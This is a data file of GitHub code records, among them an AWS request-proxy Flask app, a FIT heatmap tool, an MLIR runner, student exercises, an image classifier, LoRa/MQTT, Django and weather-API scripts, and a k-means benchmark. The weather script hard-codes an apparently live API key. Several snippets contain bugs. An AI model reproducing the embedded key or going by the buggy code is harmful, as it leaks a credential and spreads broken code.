print(\"PUT: In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"PUT: In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"PUT: In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"PUT: In except block 4\")\n jsonResponse = str(response.text.strip())\n\n \n\n\n## DELETE HTTP Requests\n elif data['VERB'] == 'DELETE':\n queryParameters = data['queryParameters'] if 'queryParameters' in data else ''\n\n response = requests.delete(data['ENDPOINT'], params=queryParameters, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 4\")\n jsonResponse = str(response.text.strip())\n\n\n\n## GET HTTP Requests\n elif data['VERB'] == 'GET':\n queryParameters = data['queryParameters'] if 'queryParameters' in data else ''\n response = requests.get(data['ENDPOINT'], params=queryParameters, headers=headers, auth=auth)\n \n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 4\")\n jsonResponse = str(response.text.strip())\n\n \n## Else throw an error about an incorrect or missing VERB parameter.\n else:\n print(\"final else block in VERB processing\") \n response = \"Error - Unable to send the HTTP to AWS request with the provided Method\"\n\n\n## Return response\n print(jsonResponse);\n if response.status_code:\n print(\"if response.status_code\")\n Result = {\"responseBody\":jsonResponse,\"responseCode\":response.status_code}\n print(Result);\n else:\n print(\"else block when returning result\")\n Result = \"Error in executing request in AWS\"\n\n return Result\n\nif __name__ == '__main__':\n app.run() ","repo_name":"vectra-ai-research/derf","sub_path":"aws-proxy-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"60"} +{"seq_id":"18335197570","text":"from typing import Optional\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n @staticmethod\n def middle_node(head: Optional[ListNode]) -> list:\n nodes = head\n while nodes[-1].next:\n nodes.append(nodes[-1].next)\n\n return nodes[len(nodes)//2]\n\n\ns = Solution()\nfunc = s.middle_node\n","repo_name":"strecobyasha/do_not_look_inside","sub_path":"middle_node.py","file_name":"middle_node.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13130330015","text":"import click\nfrom configparser import ConfigParser\nimport fitdecode\nimport os\n# from datetime import datetime\n\nparser = ConfigParser()\nparser.read('config.ini')\nAPI_KEY = parser.get('GOOGLE', 'API_KEY')\nINITIAL_LATITUDE = parser.get('MAP', 'LATITUDE')\nINITIAL_LONGITUDE = parser.get('MAP', 'LONGITUDE')\nINITIAL_ZOOM = parser.get('MAP', 'ZOOM')\n\n\n@click.command()\n@click.option(\"--output\", default=\"map\", help=\"Specify the name of the output file. Defaults to `map`\")\n@click.option(\"--input\", default=\"fit\", help=\"Specify an input folder. Defaults to `fit`\")\n@click.option(\"--filter\", default=None, help=\"Specify a filter type. Defaults to no filter\", type=click.Choice(['running', 'cycling', 'walking']))\n@click.option(\"--year\", default=None, help=\"Specify a year. Defaults to no year\", type=int, multiple=True)\n\ndef main(output, input, filter, year):\n points = load_points(input, filter, year)\n generate_html(points, output)\n\n\n# Convert Garmin time format to Python datetime - not needed anymore.\n\"\"\" \ndef convert_frame_datetime(frame_datetime):\n converted_frame_datetime = datetime.strptime(\n frame_datetime, \"%Y-%m-%d %H:%M:%S%z\")\n\n return converted_frame_datetime \n\"\"\"\n\n\n# Get fit file's created time\ndef get_fit_time(input_file):\n with fitdecode.FitReader(input_file) as fit_file:\n for frame in fit_file:\n if isinstance(frame, fitdecode.records.FitDataMessage):\n if frame.name == 'file_id':\n if frame.has_field('time_created'):\n # print(frame.get_value('time_created').year)\n x = frame.get_value('time_created')\n return x\n\n\ndef load_points(folder, filter, year):\n # Loads all fit files into a list of points\n coords = []\n\n # Loads files with progressbar\n print(f\"Loading files with type {filter} for {year}...\")\n with click.progressbar(os.listdir(folder)) as bar:\n for filename in bar:\n # Verify file is a fit file\n if (filename.lower().endswith(\".fit\")):\n fit_file = os.path.join(folder, filename)\n # Get fit file's created date\n fit_created_year = get_fit_time(fit_file).year\n # Only continue if year list is empty OR fit file's year is part of the year(s) you want to process\n if not year or fit_created_year in year:\n with fitdecode.FitReader(fit_file) as fit:\n for frame in fit:\n if isinstance(frame, fitdecode.records.FitDataMessage):\n # only pull 'record' frame - this is where coordinates are\n if frame.name == 'record':\n if frame.has_field('position_lat') and frame.has_field('position_long'):\n # Get Garmin Lat and Long from each frame\n # Convert Garmin GPS coordinates, calculcations based on this https://gis.stackexchange.com/questions/122186/convert-garmin-or-iphone-weird-gps-coordinates/368905#368905\n frame_lat = float(frame.get_value(\n 'position_lat')) / ((2**32)/360)\n frame_long = float(frame.get_value(\n 'position_long')) / ((2**32)/360)\n coords.append(\n [frame_lat, frame_long])\n\n return (coords)\n\n\ndef get_outline():\n \"\"\"Reads in the html outline file\"\"\"\n with open('map-outline.txt', 'r') as file:\n outline = file.read()\n return outline\n\n\ndef generate_html(points, file_out):\n \"\"\"Generates a new html file with points\"\"\"\n if not os.path.exists('output'):\n os.mkdir('output')\n f = open(f\"output/{file_out}.html\", \"w\")\n outline = get_outline()\n google_points = \",\\n\".join(\n [f\"new google.maps.LatLng({point[0]}, {point[1]})\" for point in points])\n updated_content = outline.replace(\"LIST_OF_POINTS\", google_points).replace(\"API_KEY\", API_KEY).replace(\n \"INIT_LATITUDE\", INITIAL_LATITUDE).replace(\"INIT_LONGITUDE\", INITIAL_LONGITUDE).replace(\"INIT_ZOOM\", INITIAL_ZOOM)\n f.write(updated_content)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"li4520/FIT-Heatmap","sub_path":"fit_heatmap.py","file_name":"fit_heatmap.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"5063950683","text":"# RUN: %PYTHON %s\nimport os\nimport ctypes\nimport numpy as np\n\nfrom hcl_mlir.ir import *\nfrom hcl_mlir.passmanager import *\nfrom hcl_mlir.execution_engine import *\nfrom hcl_mlir.runtime import *\n\nclass C128(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Double Complex.\"\"\"\n\n _fields_ = [(\"real\", ctypes.c_double), (\"imag\", ctypes.c_double)]\n\n\nclass C64(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Float Complex.\"\"\"\n\n _fields_ = [(\"real\", ctypes.c_float), (\"imag\", ctypes.c_float)]\n\n\nclass F16(ctypes.Structure):\n \"\"\"A ctype representation for MLIR's Float16.\"\"\"\n\n _fields_ = [(\"f16\", ctypes.c_int16)]\n\n\ndef to_numpy(array):\n \"\"\"Converts ctypes array back to numpy dtype array.\"\"\"\n if array.dtype == C128:\n return array.view(\"complex128\")\n if array.dtype == C64:\n return array.view(\"complex64\")\n if array.dtype == F16:\n return array.view(\"float16\")\n return array\n\n\ndef my_ranked_memref_to_numpy(ranked_memref):\n \"\"\"Converts ranked memrefs to numpy arrays.\"\"\"\n np_arr = np.ctypeslib.as_array(\n ranked_memref.aligned, shape=ranked_memref.shape\n )\n strided_arr = np.lib.stride_tricks.as_strided(\n np_arr,\n np.ctypeslib.as_array(ranked_memref.shape),\n np.ctypeslib.as_array(ranked_memref.strides) * np_arr.itemsize,\n )\n return to_numpy(strided_arr)\n\n\n\ndef lowerToLLVM(module):\n # pm = PassManager.parse(\n # \"builtin.module(lower-affine,convert-scf-to-cf,convert-arith-to-llvm,convert-memref-to-llvm,convert-func-to-llvm,convert-cf-to-llvm,reconcile-unrealized-casts)\")\n pm = PassManager.parse(\n \"builtin.module(\"\n \"convert-linalg-to-affine-loops,\"\n \"one-shot-bufferize,\"\n \"lower-affine,\"\n \"convert-scf-to-cf,\"\n \"convert-cf-to-llvm,\"\n \"convert-func-to-llvm,\"\n \"convert-arith-to-llvm,\"\n \"finalize-memref-to-llvm,\"\n \"reconcile-unrealized-casts\"\n \")\"\n )\n \n pm.run(module.operation)\n # module.dump()\n return module\n\n\ndef get_assembly(filename):\n with open(filename, \"r\") as f:\n code = f.read()\n return code\n\n\"\"\"\nAssumptions:\n1. returned values are moved to input arg list\n2. invoke entry point function is named \"top\"\n3. llvm.emit_c_interface is attached to the top function\n\"\"\"\ndef run_ir(ir_filename, input_args, output_args):\n code = get_assembly(os.path.join(os.path.dirname(\n os.path.abspath(__file__)), ir_filename))\n\n # Add shared library\n if os.getenv(\"LLVM_BUILD_DIR\") is not None:\n shared_libs = [\n os.path.join(os.getenv(\"LLVM_BUILD_DIR\"),\n 'lib', 'libmlir_runner_utils.so'),\n os.path.join(os.getenv(\"LLVM_BUILD_DIR\"),\n 'lib', 'libmlir_c_runner_utils.so')\n ]\n print(\"Got shared libs: {}\".format(shared_libs))\n else:\n print(\"LLVM_BUILD_DIR not set\")\n shared_libs = None\n\n input_memrefs = [ctypes.pointer(ctypes.pointer(get_ranked_memref_descriptor(arg))) for arg in input_args]\n # output_memrefs = [ctypes.pointer(ctypes.pointer(get_ranked_memref_descriptor(arg))) for arg in output_args]\n output_memrefs = [get_ranked_memref_descriptor(arg) for arg in output_args]\n # pack output memref into a struct with ctypes\n # first, make a struct with two fields: memref0, memref1\n class OutputStruct(ctypes.Structure):\n _fields_ = [(\"memref0\", output_memrefs[0].__class__), \\\n (\"memref1\", output_memrefs[1].__class__)]\n \n out_struct = OutputStruct()\n # assign the memref pointers to the struct\n out_struct.memref0 = output_memrefs[0]\n out_struct.memref1 = output_memrefs[1]\n # do a pointer of pointer of the struct\n output_memrefs = ctypes.pointer(ctypes.pointer(out_struct))\n\n with Context():\n module = Module.parse(code)\n lowered = lowerToLLVM(module)\n if shared_libs is not None:\n execution_engine = ExecutionEngine(\n lowered, opt_level=0, shared_libs=shared_libs)\n else:\n execution_engine = ExecutionEngine(lowered)\n execution_engine.invoke(\n \"kernel\", output_memrefs, *input_memrefs)\n \n res0 = my_ranked_memref_to_numpy(output_memrefs[0][0].memref0)\n res1 = my_ranked_memref_to_numpy(output_memrefs[0][0].memref1)\n\n print(res0)\n print(res1)\n\n\ndef test_multi_return():\n filename = \"./ir.mlir\"\n np_A = np.random.randint(0, 10, size=(10,)).astype(np.int32)\n np_B = np.random.randint(0, 10, size=(10,)).astype(np.int32)\n out_A = np.zeros_like(np_A).astype(np.int32)\n out_B = np.zeros_like(np_B).astype(np.int32)\n print(np_A)\n print(np_B)\n run_ir(filename, input_args=[np_A, np_B], output_args=[out_A, out_B])\n # print(out_A)\n # print(out_B)\n\n\nif __name__ == \"__main__\":\n test_multi_return()","repo_name":"zzzDavid/hcl-debug","sub_path":"multi-return/ir_runner.py","file_name":"ir_runner.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73801942590","text":"#ANS1\r\ntxt=str(input(\" \"))\r\ntxt1=txt[::-1]\r\nprint(txt1)\r\n\r\n\r\n\r\n#ANS2\r\na=int(input(\"range:\"))\r\nb=int(input(\"User Number:\"))\r\nfor i in range(a):\r\n if i%b==0:\r\n print(i)\r\n continue\r\n \r\n\r\n\r\n\r\n#ANS3\r\na = int(input(\"Enter the first length: \"))\r\nb = int(input(\"Enter the second length: \"))\r\nc = int(input(\"Enter the third length: \"))\r\nif (a + b > c) and (a + c > b) and (b + c > a):\r\n print(\"Yes\") \r\n s=(a+b+c)/2\r\n area=(s*(s-a)*(s-b)*(s-c))**0.5\r\n print('The area of the triangle is %0.2f' %area) \r\nelse:\r\n print(\"No\") \r\n \r\n \r\n \r\n \r\n#ANS4\r\nn=int(input(\"No. of Rows: \"))\r\nfor i in range(n):\r\n for j in range(i):\r\n print ('* ', end=\"\")\r\n print('')\r\n\r\nfor i in range(n,0,-1):\r\n for j in range(i):\r\n print('* ', end=\"\")\r\n print('')\r\n \r\n \r\n \r\n#ANS5\r\nn=int(input(\"No. of Rows: \"))\r\nx=ord(\"A\")\r\nfor i in range(n):\r\n for j in range(i+1):\r\n print(chr(x), end=\"\")\r\n x=x+1\r\n print('')\r\n\r\n\r\n\r\n#ANS6\r\nn=int(input(\"range:\"))\r\nfor number in range (n): \r\n if number > 1: \r\n for i in range (2, number): \r\n if (number % i) == 0: \r\n break \r\n else: \r\n print (number) \r\n\r\n\r\n\r\n#ANS7\r\nn=[]\r\nfor i in range(0,501,1):\r\n if i%11==0 and i%7==0:\r\n n.append(str(i))\r\nprint (n)\r\n\r\n\r\n#ANS8\r\nlist = []\r\nn = int(input(\"Enter number of elements : \"))\r\nfor i in range(0, n):\r\n x = int(input())\r\n \r\n list.append(x) \r\n \r\nprint(list)\r\n\r\n#a Positive Numbers\r\nfor i in list:\r\n if i>=0:\r\n print(i, \"is positive\")\r\n continue\r\n \r\n#b Negative Numbers\r\nfor i in list:\r\n if i<0:\r\n print(i,\"is negative\")\r\n continue\r\n\r\n#c Odd Numbers\r\nfor i in list:\r\n if i%2!=0:\r\n print(i,\"is Odd\")\r\n continue\r\n\r\n#d Even Numbers\r\nfor i in list:\r\n if i%2==0:\r\n print(i,\"is Ever\")\r\n continue\r\n \r\n#e Number of times each number occurs in the List \r\nfor i in list:\r\n a=list.count(i)\r\n print(f\"Count of {i}={a}\")\r\n continue\r\n \r\n \r\n\r\n#ANS9\r\nlist = []\r\nn = int(input(\"Enter number of elements : \"))\r\nfor i in range(0, n):\r\n q=str(input())\r\n \r\n list.append(q) \r\n \r\nprint(list)\r\nfor i in list:\r\n a=list.count(i)\r\n print(f\"Count of {i}={a}\")\r\n continue","repo_name":"BT22104052/ES1101","sub_path":"Assignment 5.py","file_name":"Assignment 5.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2596072215","text":"import os\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.layers import Dense, Dropout, GlobalAveragePooling2D\nfrom tensorflow.core.protobuf.config_pb2 import ConfigProto\nimport tensorflow.keras.layers as ly\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import Sequential\nimport cv2\nimport numpy as np\nfrom tensorflow.python.client.session import InteractiveSession\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\nbase_model = InceptionResNetV2(weights='imagenet', include_top=False, input_shape=(256, 256, 3))\nbase_model.trainable = False\n\nadd_model = Sequential()\nadd_model.add(base_model)\nadd_model.add(GlobalAveragePooling2D())\nadd_model.add(Dropout(0.25))\nadd_model.add(Dense(3,\n activation='softmax'))\n\nmodel = add_model\nmodel.compile(loss='sparse_categorical_crossentropy',\n optimizer=Adam(learning_rate=0.0035),\n metrics=['accuracy'])\n\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\nmodel.load_weights('/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/custom_weights.hdf5')\n\n\ndef preprocess_image(directory):\n # Read image from directory\n img = cv2.imread(directory, cv2.IMREAD_COLOR)\n\n if img is not None:\n img = cv2.resize(src=img, dsize=(256, 256), interpolation=cv2.INTER_AREA)\n img = cv2.fastNlMeansDenoising(img, None, 10, 7, 21)\n img = img / 255\n return img\n else:\n pass\n\n\npredicted_map = {0: 'Animated illustration', 1: 'Logo', 2: 'Screenshot'}\n\nfiles = os.listdir('/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/test_images')\nfor file in files:\n preprocessed_image = preprocess_image(f'/home/edutech-pc06/PycharmProjects/OerAdap-Modulo-Imagenes/Level2 Illustration/Level3 Digital/test_images/{file}')\n preprocessed_image = preprocessed_image.reshape(-1, 256, 256, 3)\n print('Filename: ' + file + '\\t' + predicted_map.get(np.argmax(model.predict(preprocessed_image), axis=1)[0]))\n","repo_name":"EduTech-Erasmus-Project/OerAdap-Modulo-Imagenes","sub_path":"Level2 Illustration/Level3 Digital/test_weights.py","file_name":"test_weights.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29189412123","text":"from mqtt import MQTTClient\r\nfrom network import WLAN\r\nimport os\r\nimport machine\r\nimport time\r\nfrom network import LoRa#pour géré le module lora\r\nimport socket \t\t\t#pour envoyer des trames\r\nimport pycom\t\t\t#Pour Mieux dormire la nuit DIsable Blink !\r\nfrom struct import *\r\n\r\nuart = machine.UART(0, 115200)\r\nos.dupterm(uart)\r\n\r\npycom.heartbeat(False)\r\n\r\nlora = LoRa(mode=LoRa.LORA, region=LoRa.EU868, bandwidth=1,preamble=10, sf=12,tx_power=20,coding_rate=1)#\r\ns = socket.socket(socket.AF_LORA, socket.SOCK_RAW)#définition d'un socket réseaux de type lora\r\n\r\n\r\nknown_nets = {\r\n 'wifilocal': {'pwd': 'PWD','wlan_config': ('192.168.x.x', '255.255.x.x', '192.168.x.x', '1.1.1.1')},\r\n 'hotspot': {'pwd': 'PWD'}\r\n}\r\n\r\nif machine.reset_cause() != machine.SOFT_RESET:\r\n from network import WLAN\r\n wlan = WLAN()\r\n wlan.mode(WLAN.STA)\r\n original_ssid = wlan.ssid()\r\n original_auth = wlan.auth()\r\n\r\n print(\"Scanning for known wifi nets\")\r\n available_nets = wlan.scan()\r\n nets = frozenset([e.ssid for e in available_nets])\r\n\r\n known_nets_names = frozenset([key for key in known_nets])\r\n net_to_use = list(nets & known_nets_names)\r\n try:\r\n net_to_use = net_to_use[0]\r\n net_properties = known_nets[net_to_use]\r\n pwd = net_properties['pwd']\r\n sec = [e.sec for e in available_nets if e.ssid == net_to_use][0]\r\n if 'wlan_config' in net_properties:\r\n wlan.ifconfig(config=net_properties['wlan_config'])\r\n wlan.connect(net_to_use, (sec, pwd), timeout=10000)\r\n while not wlan.isconnected():\r\n machine.idle() # save power while waiting\r\n print(\"Connected to \"+net_to_use+\" with IP address:\" + wlan.ifconfig()[0])\r\n\r\n except Exception as e:\r\n print(\"Failed to connect to any known network, going into AP mode\")\r\n wlan.init(mode=WLAN.AP, ssid=original_ssid, auth=original_auth, channel=6, antenna=WLAN.INT_ANT)\r\n\r\n# import network\r\n# server = network.Server()\r\n# server.deinit() # disable the server\r\n# server.init(login=('user', 'password'), timeout=600\r\n\r\nclient = MQTTClient(\"deviceid\", \"x.x.x.x\",user=\"xxxx\", password=\"xxx\", port=xxxx)\r\nclient.connect()\r\n\r\n\r\n\r\nclient.publish(topic=\"coordoner\", msg=\"lon,lat,rssi,snr\")\r\nprint(\"lon,lat,rssi,snr\")\r\nwhile True:\r\n data=s.recv(16)#corriger la taille d'un packet !\r\n try:\r\n coordoner=unpack('ff',data)\r\n # lont , lat , rssi , snr\r\n data=str(coordoner[0])+\",\"+str(coordoner[1])+\",\"+str(lora.stats()[1])+\",\"+str(lora.stats()[2])\r\n print(data)\r\n client.publish(topic=\"coordoner\", msg=data)\r\n time.sleep(1)\r\n except Exception as e:\r\n print(\"exeption:\"+str(data))\r\n","repo_name":"megachonker/Lora-Plot","sub_path":"recepteur/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7698367288","text":"from django.urls import path\nfrom . import views\nfrom .login_views import login\n\n\nurlpatterns = [\n path('', views.bot_start, name='bot_start'),\n # path('', Home.as_view(), name='home'),\n path('test/', views.test, name='test'),\n path('greet/', views.greet, name='greet'),\n path('chatbot/', views.chatbot, name='chatbot'),\n\n\n path('api/login', login),\n]\n","repo_name":"riteshsharthi/BOT","sub_path":"TataChatBot/chatroom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"234096197","text":"from users.mixins import WriteCheckMixin\n\nfrom .models import TruckImage, TrailerImage, TruckDocument, TrailerDocument, \\\n CompanyDocument\nfrom .forms import TruckImageForm, TrailerImageForm, TruckDocumentForm, \\\n TrailerDocumentForm, CompanyDocumentForm\nfrom .mixins import ImageCreateView, ImageListView, DocumentCreateView, \\\n DocumentListView\nfrom invent.models import Truck, Trailer, Company\n\n\nclass TruckImageView(WriteCheckMixin, ImageCreateView):\n model = TruckImage\n form_class = TruckImageForm\n origin_model = Truck\n folder_name = 'trucks'\n\n\nclass TruckImageListView(WriteCheckMixin, ImageListView):\n model = TruckImage\n origin_model = Truck\n key_url = \"invent:truck\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.truckimage_set.all()\n\n\nclass TrailerImageView(WriteCheckMixin, ImageCreateView):\n model = TrailerImage\n form_class = TrailerImageForm\n origin_model = Trailer\n folder_name = 'trailers'\n\n\nclass TrailerImageListView(WriteCheckMixin, ImageListView):\n model = TrailerImage\n origin_model = Trailer\n key_url = \"invent:trailer\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.trailerimage_set.all()\n\n\nclass TruckDocumentView(WriteCheckMixin, DocumentCreateView):\n model = TruckDocument\n form_class = TruckDocumentForm\n origin_model = Truck\n folder_name = 'trucks'\n\n\nclass TruckDocumentListView(WriteCheckMixin, DocumentListView):\n model = TruckDocument\n origin_model = Truck\n key_url = \"invent:truck\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.truckdocument_set.all()\n\n\nclass TrailerDocumentView(WriteCheckMixin, DocumentCreateView):\n model = TrailerDocument\n form_class = TrailerDocumentForm\n origin_model = Trailer\n folder_name = 'trailers'\n\n\nclass TrailerDocumentListView(WriteCheckMixin, DocumentListView):\n model = TrailerDocument\n origin_model = Trailer\n key_url = \"invent:trailer\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.trailerdocument_set.all()\n\n\nclass CompanyDocumentView(WriteCheckMixin, DocumentCreateView):\n model = CompanyDocument\n form_class = CompanyDocumentForm\n origin_model = Company\n folder_name = 'companies'\n\n\nclass CompanyDocumentListView(WriteCheckMixin, DocumentListView):\n model = CompanyDocument\n origin_model = Company\n key_url = \"invent:company\"\n\n def get_queryset(self):\n origin = self.get_origin()\n return origin.companydocument_set.all()\n","repo_name":"gunnerson/tsm","sub_path":"docs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43214684859","text":"import requests\nimport json\n\n\nclass CallWeatherman:\n\n BASE_URL = \"http://api.openweathermap.org/data/2.5/weather?{}{}\"\n FUNCTION = \"id=5746545\"\n API_KEY = \"&APPID=7f283940189575de586b368bad666ed1\"\n\n def __init__(self):\n\n self.temperature = 0\n\n def execute(self):\n\n response = requests.get(self.BASE_URL.format(self.FUNCTION, self.API_KEY))\n if response.status_code != 200:\n # This means something went wrong.\n print('GET /tasks/ {}'.format(response.status_code))\n\n return_bin = b\"\"\n for response_part in response:\n return_bin += response_part\n\n self.find_temperature(return_bin)\n\n def find_temperature(self, json_object):\n\n weather_dict = json.loads(json_object.decode())\n kelvin = (weather_dict['main']['temp'])\n fahrenheit = (kelvin - 273.15) * 9/5 + 32\n fahrenheit_rounded = round(fahrenheit, 2)\n self.temperature = fahrenheit_rounded\n return fahrenheit_rounded\n\n\nif __name__ == \"__main__\":\n\n wet = CallWeatherman()\n wet.execute()\n","repo_name":"CommanderPaul/weather_api","sub_path":"call_weatherman.py","file_name":"call_weatherman.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"27292943387","text":"from time import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import load_digits\nfrom sklearn.preprocessing import scale\n\nnp.random.seed()\ndigits = load_digits()\ndata = scale(digits.data)\n\nn_sample, n_features = data.shape\nn_digits = len(np.unique(digits.target))\nlabels = digits.target\n\nsample_size = 300\n\nprint(\"n_digits: %d, \\t n_samples: %d, \\t n_features %d\" %(n_digits, n_samples,n_features))\nprint(79 * '_')\nprint('% 9s' % 'init'' time inertia homo compl v-meas ARI AMI silhouette')\n\ndef bench_k_means(estimator, name, data):\n t0 = time()\n estimator.fit(data)\n print('% 9s %.2fs %i %.3f %.3f %.3f %.3f'\n %(name, (time() - t0), estimator.inertia_,\n metrics.homogeneity_score(labels, estimator.labels_),\n metrics.completeness_score(labels, estimator.labels_),\n metrics.v_measure_score(labels, estimator.labels_),\n metrics.adjusted_rand_score(data,estimator.labels_),\n metrics.silhouette_score(data, estimator.labels_,\n metric='euclidean',\n sample_size=sample_size)))\n","repo_name":"Hanuman26/DeepPy","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35264976115","text":"import json\nimport logging\nfrom pathlib import Path\n\nimport librosa\nimport numpy as np\nimport torch\nfrom scipy.signal import firwin, lfilter\nfrom soundfile import read\nfrom torch.utils import data\n\nlogger = logging.getLogger(__name__)\n\n\ndef read_wavfile(path):\n wav, _ = read(path)\n return wav.transpose()\n\n\nclass CEC1Dataset(data.Dataset):\n def __init__(\n self,\n scenes_folder,\n scenes_file,\n sample_rate,\n downsample_factor,\n wav_sample_len=None,\n wav_silence_len=2,\n num_channels=6,\n norm=False,\n testing=False,\n ):\n self.scenes_folder = scenes_folder\n self.sample_rate = sample_rate\n self.downsample_factor = downsample_factor\n self.wav_sample_len = wav_sample_len\n self.wav_silence_len = wav_silence_len\n self.num_channels = num_channels\n self.norm = norm\n self.testing = testing\n\n self.scene_list = []\n with open(scenes_file, encoding=\"utf-8\") as fp:\n scene_json = json.load(fp)\n if not testing:\n for scene in scene_json:\n self.scene_list.append(scene[\"scene\"])\n else:\n for scene in scene_json.keys():\n self.scene_list.append(scene)\n\n if self.num_channels == 2:\n self.mixed_suffix = \"_mixed_CH1.wav\"\n self.target_suffix = \"_target_anechoic.wav\"\n elif self.num_channels == 6:\n self.mixed_suffix = [\"_mixed_CH1.wav\", \"_mixed_CH2.wav\", \"_mixed_CH3.wav\"]\n self.target_suffix = \"_target_anechoic.wav\"\n else:\n raise NotImplementedError\n\n self.lowpass_filter = firwin(\n 1025,\n self.sample_rate // (2 * self.downsample_factor),\n pass_zero=\"lowpass\",\n fs=self.sample_rate,\n )\n\n def wav_sample(self, x, y):\n \"\"\"\n A 2 second silence is in the beginning of clarity data\n Get rid of the silence segment in the beginning & sample a\n constant wav length for training.\n \"\"\"\n silence_len = int(self.wav_silence_len * self.sample_rate)\n x = x[:, silence_len:]\n y = y[:, silence_len:]\n\n wav_len = x.shape[1]\n sample_len = int(self.wav_sample_len * self.sample_rate)\n if wav_len > sample_len:\n start = np.random.randint(wav_len - sample_len)\n end = start + sample_len\n x = x[:, start:end]\n y = y[:, start:end]\n elif wav_len < sample_len:\n x = np.append(\n x, np.zeros([x.shape[1], sample_len - wav_len], dtype=np.float32)\n )\n y = np.append(\n y, np.zeros([x.shape[1], sample_len - wav_len], dtype=np.float32)\n )\n\n return x, y\n\n def lowpass_filtering(self, x):\n return lfilter(self.lowpass_filter, 1, x)\n\n def __getitem__(self, item):\n scenes_folder = Path(self.scenes_folder)\n if self.num_channels == 2:\n mixed = read_wavfile(\n scenes_folder / (self.scene_list[item] + self.mixed_suffix)\n )\n elif self.num_channels == 6:\n mixed = []\n for suffix in self.mixed_suffix:\n mixed.append(\n read_wavfile(scenes_folder / (self.scene_list[item] + suffix))\n )\n mixed = np.concatenate(mixed, axis=0)\n else:\n raise NotImplementedError\n target = None\n if not self.testing:\n target = read_wavfile(\n scenes_folder / (self.scene_list[item] + self.target_suffix)\n )\n if target.shape[1] > mixed.shape[1]:\n logging.warning(\n \"Target length is longer than mixed length. Truncating target.\"\n )\n target = target[:, : 